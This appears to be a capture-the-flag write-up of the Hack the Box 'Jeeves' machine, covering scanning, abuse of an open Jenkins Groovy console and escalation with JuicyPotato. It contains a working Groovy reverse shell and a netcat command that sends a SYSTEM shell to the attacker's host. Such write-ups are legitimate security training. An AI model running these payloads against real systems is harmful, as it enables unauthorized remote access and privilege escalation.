👨‍💻
Pentesting
HomePlaygroundCTFsBuy Me a Flag 🚩
  • Zeyu's OSCP Writeups
  • Home
  • CTF Writeups
  • Playground
  • Blog Posts
    • My OSCP Journey: How I Tried Harder
  • Proving Grounds
    • Warm Up
      • Pebbles
      • Twiggy
      • Bratarina
      • Internal
      • ClamAV
    • Get to Work
      • Nibbles
      • Nickel
      • WebCal
      • Authby
      • Pelican
      • Jacko
      • Medjed
      • XposedAPI
    • Try Harder
      • Meathead
  • Hack the Box
    • Easy
      • ScriptKiddie
      • Delivery
      • Laboratory
      • Academy
      • Sense
    • Medium
      • Cronos
      • Jeeves
Powered by GitBook
On this page
  • Service Enumeration
  • Port 80
  • Port 50000
  • Exploitation
  • Privilege Escalation

Was this helpful?

  1. Hack the Box
  2. Medium

Jeeves

PreviousCronos

Last updated 4 years ago

Was this helpful?

Service Enumeration

nmapAutomator.sh -H 10.10.10.63 -t all

Port 80

A HTTP service runs on port 80. Entering an input in the search bar results in a server error, showing us some information about the versions of the services and OS it is running.

Port 50000

Another web service, running Jetty, is on port 50000. Using the directory-list-2.3-medium.txt wordlist from dirbuster, we can perform subdirectory enumeration on the target.

gobuster dir -u http://10.10.10.63:50000/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

This uncovers a /askjeeves directory.

By going to http://10.10.10.63:50000/askjeeves/, we find a Jenkins page.

Exploitation

By going to http://10.10.10.63:50000/askjeeves/script, we can execute scripts on the Groovy script console.

def cmd = "cmd.exe /c dir".execute();
println("${cmd.text}");

By changing first line in the script, we can execute arbitrary shell commands.

We can change the script to instead trigger a reverse shell.

String host="10.10.14.23";
int port=4242;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

On our Netcat listener, we obtain a reverse shell.

Privilege Escalation

We can use WinPEAS to enumerate.

After transferring JuicyPotato.exe and Netcat, we can run the following command to get another shell:

JuicyPotato -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\users\kohsuke\nc.exe -e cmd.exe 10.10.14.23 443" -t *

We have successfully obtained SYSTEM privileges.

We find a hm.txt in place of root.txt.

However, we can find that there is an additional data stream hidden in the file.

Source:

Very quickly, we see that the SeImpersonatePrivilege token is enabled. We can exploit this with JuicyPotato ().

https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76
https://github.com/ohpe/juicy-potato